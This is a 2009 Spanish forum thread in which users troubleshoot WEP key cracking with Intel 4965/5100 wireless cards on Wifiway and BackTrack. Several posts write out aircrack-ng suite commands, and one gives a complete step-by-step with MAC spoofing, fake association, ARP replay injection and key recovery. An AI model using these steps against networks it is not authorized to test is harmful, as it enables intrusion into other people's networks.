Publicado por: xeonpj en 24-03-2009, 21:51 (Martes)
yo, sinceramente, no soy el mas indicado para decirte el camino a segui, segun eso,, se refiere a que la tarjeta esta ocupada, eso me lo dice a mi cuando ejecuto antes el airdump  del WPA.


Título: Re: Inyectar con 4965
Publicado por: pekis en 25-03-2009, 14:59 (Miércoles)
Por experiencia el error que describes que te dice que la tarjeta esta busy, quiere decir que no iciste bien los pasos del manual en los que ai que up y down el chipstet. Prueba a hacerlos de nuevo al pie de la letra como pone el manual de ChimoC.

un saludo
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 25-03-2009, 15:43 (Miércoles)
k va tio, la 5100 no inyecta sin actualizacion de kernel.
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 25-03-2009, 22:14 (Miércoles)
k va tio, la 5100 no inyecta sin actualizacion de kernel.



creo que te equivocas,el portatil de mi padre tiene esa e injecta facilmente
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 26-03-2009, 08:07 (Jueves)
po macho, dime k haces por que lo intentado todo, solo me falta sacrificar uan vaca a los dioses del wifiway jeje.

El portatil HP de mi novia, con la 5100link, siguo este magnifico tutorial para la 4965, y nunca, nunca, me ha inyectado  (he esperado 3 minutos na mas eso si...), normalmemte el WPA suplican dice que ha asociado, en el airdump aparezco asociado, pero no suben los ARP ni los datas, ni na dde na...
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 26-03-2009, 12:36 (Jueves)
prueba con un manual de backtrack.
yo hago:
airmon-ng start wifi0
airodump-ng ath1
airodump-ng -w archivo --bssid ap MAc -c canal ath1
aireplay-ng --fakeauth 0 -e ap essid -a ApMAc ath1
(en caso de no asociar con el de arriba pon : aireplay-ng --fakeauth 6000 -o 1 -q 10 -e AP essid -a ApMac ath1
esperar a que salga asociation sucessful
aireplay-ng -3 -b MAc  ath1
esperar y aircrack-ng archivo.cap
saludos
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 26-03-2009, 14:03 (Jueves)
todo eso con blacktrack o con wifiway?

EDIT: pero, si el protatild e tu viejo tienen la 5100, como que lanzas los comandos al interfaz ath1, ese s para las atheros, yo solo tengo el wlan0, y despues el mon0 (cuando hago el airmon-ng)
Título: Re: Inyectar con 4965
Publicado por: pekis en 26-03-2009, 20:31 (Jueves)
No funciona con todos los routers.. por experiencia propia ai algunos router que no son sensibles a este ataque. Prueba con otro y haber si te va.
sal2
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 26-03-2009, 22:31 (Jueves)
pruebo con mi speedtuch k tengo pa pruebas, y con la realink pci k tengo va de fabula.....
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 26-03-2009, 23:53 (Jueves)
todo eso con blacktrack o con wifiway?

EDIT: pero, si el protatild e tu viejo tienen la 5100, como que lanzas los comandos al interfaz ath1, ese s para las atheros, yo solo tengo el wlan0, y despues el mon0 (cuando hago el airmon-ng)

si todo eso con wifiway y creo que su tarjeta era una 5100,ahora me has dejado dudando.mañana lo miro y te posteo aqui lo que es y como lo hace el.
saludos
Título: Re: Inyectar con 4965
Publicado por: lmerli en 02-04-2009, 14:50 (Jueves)
hola buenas tambien tengo esta tarjeta y bueno el aireplay-ng me sale leyendo paquetes y envia paquetes (499pps)

el airodumb-ng me sale las redes wifis que tengo a mi alcance y los beacons por ej me sube muy rapido pero los #data que es lo que interesa va lento 44min 641
y el aircrack-ng si lo pongo y escojo la red pues me sale error por falta de IV,s me pide minimo 5.000 y lleva en ese tiempo 547 ¿ hago algo mal?
gracias
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 03-04-2009, 00:56 (Viernes)
estas creando trafico via wifi con otro ordenador?sin clientes puede tardar muuuuucho
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 03-04-2009, 09:39 (Viernes)
la idea principal de inyectar es generar ese trafico que no existe al no haber clientes.....

entonces si tu conectas un cliente, y te lias a bajarte peliculas de la red y generas los 50000 iv´s.... entonces de que estamos hablando?
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 03-04-2009, 12:11 (Viernes)
la idea principal de inyectar es generar ese trafico que no existe al no haber clientes.....

entonces si tu conectas un cliente, y te lias a bajarte peliculas de la red y generas los 50000 iv´s.... entonces de que estamos hablando?

yo solo os digo lo poco que se...
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 03-04-2009, 12:12 (Viernes)
xeonpj lo del portatil de mi padre era en bt3 no en wifiway sorry me equivoqué
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 03-04-2009, 12:54 (Viernes)
vale, de todas formas me kedo mas trankilo, estoy seguro k la 5100 no inyecta de ninguna de las maneras, al menos en el hp, tu tampoco has inyectado nada si me ceuntas que lo haces generando trafico con otro pc....


Título: Re: Inyectar con 4965
Publicado por: chinitiw en 03-04-2009, 13:29 (Viernes)
Citar
estoy seguro k la 5100 no inyecta de ninguna de las maneras

https://foro.seguridadwireless.net/live-cd-wifiway-1-0-renovation-kde/intel(r)-wireless-wifi-link-5100-y-wifiway-1-0-final/

 ???
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 03-04-2009, 21:56 (Viernes)
chinitiw como en el post de la 5100 pone que hay que segui este manual estabamos posteando aqui.

xeonpj yo con la 4965 si que he injectado,eso si cuando quiere...sin generar trafico con otro pc
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 13-04-2009, 12:51 (Lunes)
si es cuando kiere, con la tarjeta del manual, con la 5100.... ya ni te digo jejeje.

en fin, k le den por saco.
Título: Re: Inyectar con 4965
Publicado por: Juentes en 13-05-2009, 10:27 (Miércoles)
Hola gente, intento asociar con el wpa_supplicant pero ná de ná:

"Trying to associate with 00:1b:xx:xx:28:ee (SSID='NETGEAR' freq=2462 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
Authentication with 00:00:00:00:00:00 timed out."

así en bucle.

Lo he intentado con varias redes distintas -todas mías :P- y tanto con la 4965 como con la 5100 así que os agradecería si me pudieseis dar vuestra opinión y/o consejo.

Un saludo
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 13-05-2009, 11:05 (Miércoles)
Buenas, pon la sintaxis del commando wpa_supplicant y una copia del archivo wpa.conf para verificar que todo esta como debe, 1 saludo  ;)
Título: Re: Inyectar con 4965
Publicado por: Juentes en 13-05-2009, 12:38 (Miércoles)
Básicamente sigo lo dicho en el post:

primero creo el wpa.conf con la estructura

Código:
network={
               ssid="NETGEAR"
               key_mgmt=NONE
               bssid=sumac
               wep_key0="232323343478787"
}

y después el comando

 wpa_supplicant -c/home/root/wpa.conf -Dwext -iwlan0



gracias por tu interés. Un saludo
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 14-05-2009, 21:17 (Jueves)
Básicamente sigo lo dicho en el post:

primero creo el wpa.conf con la estructura

Código:
network={
               ssid="NETGEAR"
               key_mgmt=NONE
               bssid=sumac -----------------> Creo que tienes un mal concepto del bssid
               wep_key0="232323343478787"
}

y después el comando

 wpa_supplicant -c/home/root/wpa.conf -Dwext -iwlan0



gracias por tu interés. Un saludo


Por definicion: BSSID (Basic Service Set IDentifier)

Cambia el ''sumac'' por la dirección mac del router, y verás como todo funciona correctamente, 1 saludo  ;)
Título: Re: Inyectar con 4965
Publicado por: h4k3r en 15-05-2009, 23:41 (Viernes)
buenas e dado todos tus pasos y parece que no falla nada pero los beacons suben a unos 10 por segundo y el data 1 cada 3 segundos si llega... en el aireplay me aparece Read 15342 packets (got 0 ARP requests and 0 ACKs), sent 0 paquets...(0 pps). Luego cuando abro el aircrack me aparece el BSSID y tal y en encryption me aparce WEP (0 IVs) -->escribo aircrack-ng -z /root/swireless/capturas/(nombrefichero).cap y me aparece << KEY FOUND! [ 00:00:00:00:00:00:00:00:00:00:00:00:00 ] (ASCII: ......................) Decrypted correctly: 100%

Sabrias ayudarme en cuanto a eso e probado de repetir varias veces tus pasos y no hay manera....
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 16-05-2009, 17:28 (Sábado)
No puedes pretender sacar tu clave wep sin obtener vectores de inicialización, esos ''IV'S'' son los que te otorgan la posibilidad de que el ataque sea satisfactorio, si consigues asociar, pero no inyectar, prueba con un ataque de desautentificacion o alguna de las otras combinaciones disponibles en el foro para que
esto: Read 15342 packets (got 0 ARP requests and 0 ACKs), sent 0 paquets...(0 pps) se convierta en esto:

Read 15342 packets (got XXX ARP requests and XX ACKs), sent XXXXXX paquets...(499 pps)

Eso significará que estas injectando correctamente, y entonces , y solo entonces podrás usar el comando aircrack, 1 saludo  ;)
Título: Re: Inyectar con 4965
Publicado por: jonathan_ en 02-07-2009, 19:25 (Jueves)
buenas Bht Sata y todos aqui presentes, haber os explico mi problema un poco haber si me podeis ayudar.
sigo los pasos del manual de dexter back bien, creo una carpeta wpa.conf en swireless y dentro de la carpeta wpa.conf creo otra para poder ecribir si no no me deja llamada /root/swireless/wpa.conf, no se si sera asi bien.
todos los pasos hasta el 4 ok en el 5 viene mi problema bien ponga al final iwmon0, mon0, iwlan0 imon0, me dice,
ioctl[SIOCSIWMODE]: device or resource busy
coul not configure draiver to use managed mode
ioctl[SIOCSIWMODE]:operation not supported
wext auth param 4 value 0x0.
mi pc tiene: intel(r)wireless wifi link 4965agn y
realktek rtl8168b/8111b family pci -e gigabit ethernet nic ndis.6.0
haber si me podeis echar una manilla gracias por todo
Título: Re: Inyectar con 4965
Publicado por: caragato en 10-07-2009, 17:29 (Viernes)
hola amigos tengo un sony vaio con tarjeta intel 4965 agn y sigo el manual como pone aki pero a la hora de crear el archivo WPA.CONF no me aclaro.tengo que ponerlo en un txt como biene ahi tal cual cambiando la essid y el bessid?por favor soy bastanta novato me podriais escribir como serian los comandos para que me funcionaria el archivo?gracias
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 11-07-2009, 13:39 (Sábado)
buenas Bht Sata y todos aqui presentes, haber os explico mi problema un poco haber si me podeis ayudar.
sigo los pasos del manual de dexter back bien, creo una carpeta wpa.conf en swireless y dentro de la carpeta wpa.conf creo otra para poder ecribir si no no me deja llamada /root/swireless/wpa.conf, no se si sera asi bien.
todos los pasos hasta el 4 ok en el 5 viene mi problema bien ponga al final iwmon0, mon0, iwlan0 imon0, me dice,
ioctl[SIOCSIWMODE]: device or resource busy
coul not configure draiver to use managed mode
ioctl[SIOCSIWMODE]:operation not supported
wext auth param 4 value 0x0.
mi pc tiene: intel(r)wireless wifi link 4965agn y
realktek rtl8168b/8111b family pci -e gigabit ethernet nic ndis.6.0
haber si me podeis echar una manilla gracias por todo

Escribemos aqui todas la sintaxis de los pasos que haces, en alguno te debes equivocar porque sino me equivoco eso especifica que el dispositivo ya esta siendo usado, usas mon0 para la asociacion? y para el airodump?

hola amigos tengo un sony vaio con tarjeta intel 4965 agn y sigo el manual como pone aki pero a la hora de crear el archivo WPA.CONF no me aclaro.tengo que ponerlo en un txt como biene ahi tal cual cambiando la essid y el bessid?por favor soy bastanta novato me podriais escribir como serian los comandos para que me funcionaria el archivo?gracias

Es un archivo .conf, y dentro pegas eso, sustituyes los campos correspondientes con los datos de tu red, 1 saludo.
Título: Re: Inyectar con 4965
Publicado por: aloja en 12-07-2009, 04:12 (Domingo)
Hola a todos, necesito haber di me pueden dar una ayudita en esto. Tengo una vaio con la tarjeta wifi 4965agn, e estado buscando por el foro y encontre este tema de como inyectar con mi tarjeta.
E seguido todos los pasos pero no e podido inyectar ivs y creo q el problemas es cuando hag el archivo wpa.conf. Necesito que alguien experimentado me explique con un poquito de detalles de como se hace por que estoy empesando en esto y no se hacerlo y me gustaria aprender.

Les agradesco su ayuda. ;)
Título: Re: Inyectar con 4965
Publicado por: dexter back en 16-07-2009, 20:41 (Jueves)
Es muy simple habré un nuevo documento de texto y ahí pega el codigo que viene en la página 1
Obvio editando la mac y demás datos y al darle guardar como guardalo con el nombre y extendió que viene aquí.
espero y te sirva
Saludox
Título: Re: Inyectar con 4965
Publicado por: caragato en 23-07-2009, 17:46 (Jueves)
hola dexter black keria darte las gracias pòr todo que nos enseñas de forma gratuita alos que no tenemos ni idea de esto.e seguido el manual del principio y hago todo bien la asociacion me sale connected y la inyeccion con el aireplay -3 -b  ....... pero el problema es que llevo mas de dos horas y los datas no suben ni 1,es eso normal?tengo que esperar mas?gracias amigo
Título: Re: Inyectar con 4965
Publicado por: dexter back en 25-07-2009, 08:38 (Sábado)
no, eso no es normal, pero pueden ser varias causas, algunas son las siguientes:
1.- que estes muy lejos de router
2.-puede haber muros, paredes u objetos electronicos que interfieran o eviten el trafico de datos
3.-sino mal recuerdo hay routers que no son vulnerables a este tipo de ataque

asi que lo mas viable es que si estas en una laptop pruebes hacer todo el proceso y al final comienza a mover tu portatil y puede que lo consigas

saludos ;D
Título: Re: Inyectar con 4965
Publicado por: cantinflas en 02-08-2009, 05:35 (Domingo)
Bueno amigos yo soy más o menos nuevo en esto de Linux y WifiWay, pero ya tengo leyendolos algunos dias, donde  siguiendo sus pasos, lo que hacen, sus preguntas, etc, etc, etc ... pues dejenme decirles QUE LO CONSEGUI !!!

Si, ayer derrumbe mis dos primeras llaves WEP, y todo esto con lo que aqui han explicado  :D

Y bueno, siguiendo la onda y tratando de ser lo más cooperativo con los muchachos del foro, pues les dire como lo consegui (Paso a paso ... tratando de ser lo más detallado en mis explicaciones)


Bueno, en primer lugar abro el aeroscript (Sin comandos, voy directo a ejecutar el programa) para tratar de hacer un scan de mi entorno y asi saber la MAC, el canal y el nombre del router (Todo esto lo hice con un modem mio 2Wire)



1.- Después de esto ejecuto: "airmon-ng start wlan0 10" (el numero 10 seria el canal delrouter para atacar)



2.-a continuación en la misma ventana o shell le doy a: "ifconfig wlan0 down"



3.- Posteriormente cambio la MAC de mi conexión con el comando: "macchanger -m 00:11:22:33:44:55 wlan0"


4.- Ya cambiada la MAC ... voy y doy el comando "ifconfig wlan0 up"



5.- Después de esto creo el archivo de texto, donde lo nombro como  "wpa.conf"


network={
        ssid="ESSID"
        key_mgmt=NONE
        bssid=BSSID
        wep_key0="232323343478787"
}


MUY IMPORTANTE: HAY QUE DEJAR ABIERTO EL DOCUMENTO CREADO EN TODO EL PROCEDIMIENTO PARA QUE ASI DESPUES SE EJECUTE Y ASOCIE ... NO SE LES OLVIDE EHH !!


6.- Abrimos otra shell en la misma ventana (sesion - nuevo interprete) y escribimos:

"wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0" (El archivo de texto de nombre "wpa.config" lo puse en el desktop del Wifiway, por eso la ruta esta asi)

OBS: Si falla a la primera y no se asocia, dar CONTROL+C en la misma shell y repetir el comando hasta que salga conectado (No se olviden dejar el documento "WPA.CONFIG" abierto para que se pueda asociar)


7.- Posteriormente ya que vemos que se asocio abrimos otra shell, donde vamos a scanear la conexión y capturamos datas o paquetes con el comando:

"airodump-ng -w dexterback -c 1 mon0"


8.- Ahora que ya vemos que esta capturando paquetes y todo eso, abrimos otra shell para inyectar a la conexion:

"aireplay-ng -3 -b (AQUI VA LA MAC DEL ROUTER A ATACAR) -h 00:11:22:33:44:55 mon0"



9.- Dejamos pasar de unos 30 minutos a una hora para asi al final ejecutar el diccionario o desencriptador de claves WEP con el comando:

"aircrack-ng *.cap"

Y LISTO CLAVE WEP FUE DESCUBIERTA !!


Bueno, ahi cualquier cosa o duda pregunten por favor ... espero que esto que les explique les haya ayudado  ;D

SALUDOS !!!
Título: Inyectar con 4965 de un XPS sobre un router Zyxel
Publicado por: Lander18 en 03-08-2009, 03:28 (Lunes)
Hola a todos, yo también soy relativamente nuevo en esto, ante todo doy las gracias a todo el equipo de seguridadwireless.net por todo su desarrollo y a la gente del foro que ofrece su ayuda con buenos aportes.


Tengo un XPS M1530 y lleva incorporada la Intel Pro Wireless 4965 AGN, de la que estamos hablando en este post, después de leerlo detenidamente se sacan algunas cosas claras, y se aprende. ^^
He seguido     ""Inyectar con 4965 by Jaco, Bht Sata y Dexter Back""    para hacer varias pruebas y he conseguido ya sacar mi clave en varias ocasiones. Sin embargo tras las pruebas he llegado a algunas conclusiones que me gustaría compartir con todos, y también me han surgido dudas que me encantaría aclarar entre todos.


Para aclarar el entorno de mis pruebas, decir que el equipo atacante es el XPS con el CD-Live Wifiway 1.0 Final, y la víctima del análisis es un router Zyxel Prestige 660HW-61 emitiendo en el canal 1 con el ESSID visible y la conexión encriptada con una clave de 128-bits usando WEP. La potencia de señal detectada con el Vistumbler es de 99%, y con airodump marca 180-198.
El único cliente inalámbrico del router es mi XPS, de forma que mientras estoy testeando con Wifiway no hay clientes.



De lo que he leído en el post he sacado en claro, que hay que seguir los siguientes pasos conceptuales:

1º- Conocer el ESSID(nombre de la red) y BSSID(mac del router) del router que queremos atacar.

2º- Poner la tarjeta de red de nuestro equipo en modo monitor.

3º- Asociar nuestra mac con la del router, esto es que el router nos incluya en su lista de macs asociadas, esto a mi entender es que el router nos incluya como nodo de su red, de forma que cuando el router envia información a todos los equipos de su red, nos incluya a nosotros, solo que la información que envía estará encriptada, de esta forma es lógico entender que si no conseguimos asociar, el router no nos enviará paquetes a nosotros.
(En este punto tengo una duda, si no conseguimos asociar, ¿Sería imposible capturar paquetes? o ¿Simplemente sería más dificil capturar paquetes porque no nos estan enviando a nosotros y tendria que capturar el tráfico de otro cliente?) De las 2 opciones me decanto por la 2ª.

4º- Una vez asociados, deberíamos escuchar y capturar todo el tráfico que nos llega, este que nos llega encriptado, para posteriormente desencriptarlo, y a través de las capturas sacar la "palabra" de encriptado.

5º- La inyección, de este concepto estoy más verde, pero creo que básicamente se trata de que nuestra tarjeta envía una serie de datos al router, de forma que algunos de estos datos produzcan una respuesta perceptible en la captura. Entiendo que podría ser que nuestra tarjeta envía "palabras" al router, y este se las manda a todos los equipos asociados pero encriptada, de forma que desencriptar sea más sencillo, cuantas mas palabras enviemos, mas facil será desencriptar.
(Imaginemos que encriptar fuese ir alterando las letras de una clave, con el mensaje que se quiere enviar, de forma que si la clave es "Wifislax" y el mensaje es "Hello World" el mensaje encriptado sería: "HWeilflios lWaoxrWlidi", es decir, sin la clave no podemos saber lo que dice el mensaje, pero si enviamos un mensaje y luego lo analizamos, podremos sacar la clave).

6º- Por lo que he explicado antes, este paso sería el de sacar la clave desencriptando, para lo cual será necesario que el router se haya tragado varios mensajes y nosotros hayamos capturado los mismos mensajes pero encriptados, y en base a comparaciones y algoritmos complejos saquemos la clave.

Hasta aquí me gustaría que me corrigierais si tengo alguno de estos conceptos equivocado, o si faltase o sobrase alguno, cualquier crítica será bien recibida vaya.



Ahora mis pruebas, manteniendo siempre la misma configuración del router, misma clave, canal, etc. he probado distintas veces varios métodos, cambiando aquí y allá, pero siempre tomando como punto de partida la solución que proponeis. ;)

Al principio me partí la cabeza porque no me iba, y al tercer intento me di cuenta de mi fallo repasando los pasos que proponeis y preguntándome el porqué y para qué de cada uno de ellos. Mi fallo era cambiar la mac, y no porque mi router no admita esa mac ni nada parecido sino porque yo mismo había activado el filtrado mac en mi router hace lo menos 6 meses. Probé a desactivarla y lo conseguí, coló, conseguí mi clave. Contento probé a activar el filtrado, pero ahora sin cambiar la mac del XPS y... también coló. Por último desactivé el filtrado mac, y lo intenté sin cambiar la mac, de nuevo la volví a conseguir. De estas pruebas viene mi pregunta:  ¿Porqué cambiais la mac de vuestro equipo, no es más cómodo y limpio dejarla tal cual?

Otra de las dudas que me asaltan es sobre el airmon-ng, se supone que si le pasas el canal al principio todos los ataques, análisis y demás sólo deberían afectar al canal seleccionado, no? Si no es así, ¿qué sentido tiene pasarle el canal al principio?
Al airodump-ng le pasa exactamente lo mismo, si le digo que busque en un determinado canal, al final acaba mostrandome redes de otros canales, ¿es un bug del filtro de canales que usan ambos programas?

Otra de las cosas que me he percatado es en la creación del fichero wpa.conf, ya se que decís que la wep_key0="232323343478787" puede ser cualquier otra pero en ese caso, ya que puede ser cualquiera le pondría un nombre más sencillo por ejemplo wep_key0="123456789012345", probé con wep_key0="0000" y me daba error así que no si si la longitud si que importa, pero también probé con wep_key0="123456789012" y asoció perfectamente.

Sobre el WPA_supplicant me gustaría saber con más exctitud qué es lo que hace, porque como han comentado muchos aquí no suele asociar a la primera, y después de un Ctrl+C y ejecutarlo de nuevo conecta, esto se me hace raro, y me pregunto porqué, ¿podría ser que a veces el mensaje no le llega bien al router y otras veces le llega mejor?. Según se hace en diversas tecnologías inalámbricas como la telefonía móvil y el Bluetooth, mientras no hay clientes el dispositivo disminuye la potencia, y una vez asociado la aumenta, y una vez conectado y verificado se aumenta aún más, por este motivo no me extraña que con el Wifi ocurra algo parecido, sin clientes el router en menos sensible y menos potente, por eso puede que a veces el wpa_supplicant funciones y otras no, ¿Alguien aporta otra teoría?

Otra de las cosas que no me deja dormir y me tiene aquí escribiendo a las 3 de la mañana es, porqué narices sin modificanar ni el router ni la distancia ni nada, a veces de saca la clave a los 6 minutos y otras veces le cuesta media hora??

Para que podamos comparar sobre la velocidad de nuestra tarjeta, decir que cuando "funciona" lo hace a 499pps y muy muuy estables. La vez que me la sacó en 6 minutos se tiró el 1er minuto con 2 datas, el 2º con 4 datas, 3º con 7datas, 4º con 9 datas, y al 5º despertó, en 6 minutos tenía la clave con 30000 IV,s.

Tambien quería preguntaros si sabeis la respuesta en frecuencia de la tarjeta ya que cuando pongo el canal del router a partir del 10 no pillo nada con windows, de hecho el canal 3 y el 5 me dan problemas (interrupciones, que no interferencias porque no detecto más redes cercanas ni con el vistumbler), sinedo el canal 1 el que mejor me va, dandome un nivel del 99% estando en una planta inferior al router, con una pared que separa la habitación y una distancia de unos 8 metros.

Saludos!!  ;D
Título: Re: Inyectar con 4965
Publicado por: chiva en 22-08-2009, 11:15 (Sábado)
Lander, a lo mejor tienes configurada la tarjeta para los canales 1-11, por que yo tengo la mía en el 13 y conecta perfectamente.

Lo raro es que en el wifiway no me detecta mi red, no se si es porque configura la tarjeta para los canales 1-11 o que.

También aprovecho para dejar un mini-manual con todos los pasos que he hecho y le echéis un vistazillo por si le véis algún fallo.
Tiene los pasos tanto como los de las redes WLAN_XX como los de las WEP normales.

http://www.megaupload.com/?d=5H1KU0NJ

Un saludo
Título: Re: Inyectar con 4965
Publicado por: Vulcan en 25-08-2009, 16:01 (Martes)
Hola muy buenas soy nuevo en esto pero no en linux realmente mi duda es xq no soy capaz de inyectar trafico hago todo tal y como decis pero el problema eske que ya cuando poco el comando airodump para ver si recibo paquetes recibo muy pocos despues de 30 minutos solo abre recibido unos 40 y bueno luego puse el aireplay y nada otros 30 minutos y no habia enviado ningun paquete alguna idea de que puedo estar haciendo mal o nuse logicamente tengo una ipw 4965 si quereis puedo poner capturas de pantalla. Un saludo y espero respuesta muchas gracias
Título: Re: Inyectar con 4965
Publicado por: Gorka41 en 30-08-2009, 02:08 (Domingo)
Muchos de los problemas que se plantean son por las condiciones particulares que hay cuando haceis los ataques. Distancia al router , tipo de router , seguridades adicionales como MAC coincidentes con las grabadas en el router, clientes conectados en ese instante, ...

Para tener exito en los ataques hay que plantearlos bien dependiendo de las condiciones.

El ataque planteado en la primera pagina es para una situacion con cliente conectado y sin seguridad por MAC.

Para inyectar primero tienes que conseguir recibir un ACK y sin clientes conectados pueden pasar  horas , dias o nunca. En este caso hay que plantear ataques combinados y probar (para esto hay mucha informacion en el foro y es independiente de la tarjeta utilizada )

Si hay seguridad por MAC tienes que conectarte con una MAC aceptada por tu router; si no no consigues asociar.

...

Saludos
Título: Re: Inyectar con 4965
Publicado por: caragato en 02-09-2009, 19:45 (Miércoles)
 :-[hola amigos de ste maravilloso foro os comento.tengo un sony vaio con esta tarjeta 4965 y sigo el estupendo manual que hay.asocio bien con mi ap,inyecto con aireplay-ng -3 -b........ y al cabo de dos horas empiezan a subir los datas hasta 900000.resulta que pongo aircrack-ng -z nombre-01.cap yno puedo conseguir la cable me pone que no tengo datas suficientes y resulta que es una clave facil que con 200000 bastarian.a k puede ser devido esto?gracias amigos
Título: Re: Inyectar con 4965
Publicado por: FUKER en 19-09-2009, 12:25 (Sábado)
Buenas! Yo he conseguido reinyectar, el problema es que no me suben los datas casi nada.
De vez en cuando en los datas por segundo aparece 40 por ejemplo durante un segundo y se quita.
Os dejo una captura (con las macs tapadas a ver si me podeis decir porque no reinyecta continuamente)
(http://i34.tinypic.com/2u3wlmp.jpg)

Comentar que lo he dejado media hora y solo llevaba 5000 datas

P.D. He seguido los pasos de dexterback
Un saludo y gracias!
Título: Re: Inyectar con 4965
Publicado por: Gorka41 en 20-09-2009, 18:33 (Domingo)
EL porque de tu problema , lo tienes comentado por mi 2 mensajes mas arriba.
Título: Re: Inyectar con 4965
Publicado por: FUKER en 21-09-2009, 00:07 (Lunes)
EL porque de tu problema , lo tienes comentado por mi 2 mensajes mas arriba.

Pero no entiendo. El nivel de potencia es bueno, y ya he recibido ARP´s por lo que puedo reinyectar. Lo que no entiendo es, aun reinyectando, que no tenga un  flujo continuo de datas....
Título: Re: Inyectar con 4965
Publicado por: Gorka41 en 23-09-2009, 21:28 (Miércoles)
Tienes continuas desconexiones en la asociacion, ¿a que distancia estas de tu router?
Título: Re: Inyectar con 4965
Publicado por: Elgo2004 en 24-09-2009, 11:23 (Jueves)
Hola hola!! Perdonad que me meta por aquí en la discusión, pero he leído todo el post y no encuentro solución a mi problema.
Veréis, quiero auditar mi propia red wifi de nombre JAZZTEL_6E con un aspire 4935G, y estoy utilizando los tutos que estáis metiendo en este post. Hago lo del wpa_supplicant, asocia bien, y hago el airodump-ng, suben los data poco a poco, pero suficiente para que funcione el diccionario de claves; el problema es que en airodump-ng, JAZZTEL_6E ahora aparece como OPN, y lógicamente aircrack-ng no tira ni cara al aire porque me dice que aparentemente la red no está encripitada. Si hago un reset de la live y le doy al airodump antes del wpa_supplicant, aparece como WEP, pero al wpa_supplicant no le da la gana de funcionar...

Alguna inspiración? Gracias por adelantado!!
Título: Re: Inyectar con 4965
Publicado por: FUKER en 27-09-2009, 00:29 (Domingo)
Tienes continuas desconexiones en la asociacion, ¿a que distancia estas de tu router?

Que yo sepa no tengo desconexiones en la desconexión. La distancia al router es de unos 10-15 metros.

Saludos!
Título: Re: Inyectar con 4965
Publicado por: Gorka41 en 27-09-2009, 01:02 (Domingo)
Intentalo mas cerca (5 metros estaria bien). Te digo que tienes varias desconexiones porque en la ventana de wpa_supplicant, si te fijas confirma en varias veces la asociacion. Si la has forzado tu , me cayo y no es el problema.
Si vuelve a confirmar la asociacion de forma automatica es porque previamente se ha desasociado.

Puede ser que el motivo no sea la distancia o haber paredes por medio; la causa venga del router. Hay routers que los fabricantes han desarrollado software mas dificil de vulnerar.

No siempre se puede dar una solucion. La practica , cambiando pequeñas cosas es lo mejor.

Un saludo
Título: Re: Inyectar con 4965
Publicado por: futurdj en 02-10-2009, 14:44 (Viernes)
en la [Guía Completa Aircrack-ng]~ por que siempre utiliza como interface eth1 i no la va variando como nosotros de wlan0 a mon0???? no lo acabo de entender.
Título: Re: Inyectar con 4965
Publicado por: Lander18 en 03-10-2009, 03:33 (Sábado)
en la [Guía Completa Aircrack-ng]~ por que siempre utiliza como interface eth1 i no la va variando como nosotros de wlan0 a mon0???? no lo acabo de entender.

Para empezar la interface eth1 es para conaxión por el cable ethernet, asi que no se que e refieres, igual tienes que replantear la pregunta.

Por otro lado creo que ya está bastante explicado en el foro, que al poner la interface wlan0 (que es la de la tarjeta inalámbrica para uso normal) en modo motitor, lo que hace es algo así como crear una interface virtual llamada mon0 lista para monitorear, la cual deberemos eliminar para volver a usar wlan0 con conexión normal.
Título: Re: Inyectar con 4965
Publicado por: futurdj en 03-10-2009, 21:28 (Sábado)
Vale puede ser lo que tu dices pero, ahora estoy con otra tarjeta wifi i en iwconfig la wifi me sale como eth1. osea.... sigo =
Título: Re: Inyectar con 4965
Publicado por: Gorka41 en 03-10-2009, 21:44 (Sábado)
Para preguntas concretas sobre otra tarjeta , abre otro post con mas datos para que podamos ayudarte.

No somos adivinos.
Título: Re: Inyectar con 4965
Publicado por: futurdj en 03-10-2009, 22:41 (Sábado)
culpa del leader 18. que me ha respondido a la pregunta que hice ayer.
Título: Re: Inyectar con 4965
Publicado por: anderete en 06-10-2009, 18:31 (Martes)
Tengo un sony vaio con la 4965 + wifiway 1.0. El problema es que al ponerla en monitor, me sale chipset unknown. Ni que decir tiene, que he seguido tosdos los pasos y no consigo inyectar. ¿Tiene que ver con el chipset?¿alguna sugerencia?
Gracias
Título: Re: Inyectar con 4965
Publicado por: futurdj en 07-10-2009, 13:16 (Miércoles)
ami tambien me salia el "unknown" y he conseguido inyectar varuas veces. En WEP se supone que inyectas no?
Título: Re: Inyectar con 4965
Publicado por: pertiga en 08-10-2009, 09:14 (Jueves)
7.- aireplay-ng -3 -b mac ap -h 00:11:22:33:44:55 mon0

hola en este punto me quedo atrancado, el mac ap se supone que sale donde pone station, y ami ahi me sale 00:11:22:33:44:55, por tanto no me vale.
por tanto pongo el bssid y despues de mucho rato pues sube muy despacion parece que inyecta, pero vamos despues de media hora pone que solo tengo 11ivs y que necesito 5000 para sacar la key.
que hago mal???
Título: Re: Inyectar con 4965
Publicado por: sinplague en 12-10-2009, 12:34 (Lunes)
necesito ayuda.

lo hago todo igual y me funciona, entonces empiezo a inyectar y me suben los ACKs al rato y no los ARP , no entiendo el motivo ...

0 packages enviados ...

por qué puede pasar?
lo que me parece raro es que al hacer el airmon-ng start wlan0 me aparece Driver iwlagn pero Chipset  UNKNOWN, puede ser? Es la versión 1.0 final de Wifiway...
Título: Re: Inyectar con 4965
Publicado por: Gorka41 en 12-10-2009, 13:24 (Lunes)
Muchos de los problemas que se plantean son por las condiciones particulares que hay cuando haceis los ataques. Distancia al router , tipo de router , seguridades adicionales como MAC coincidentes con las grabadas en el router, clientes conectados en ese instante, ...

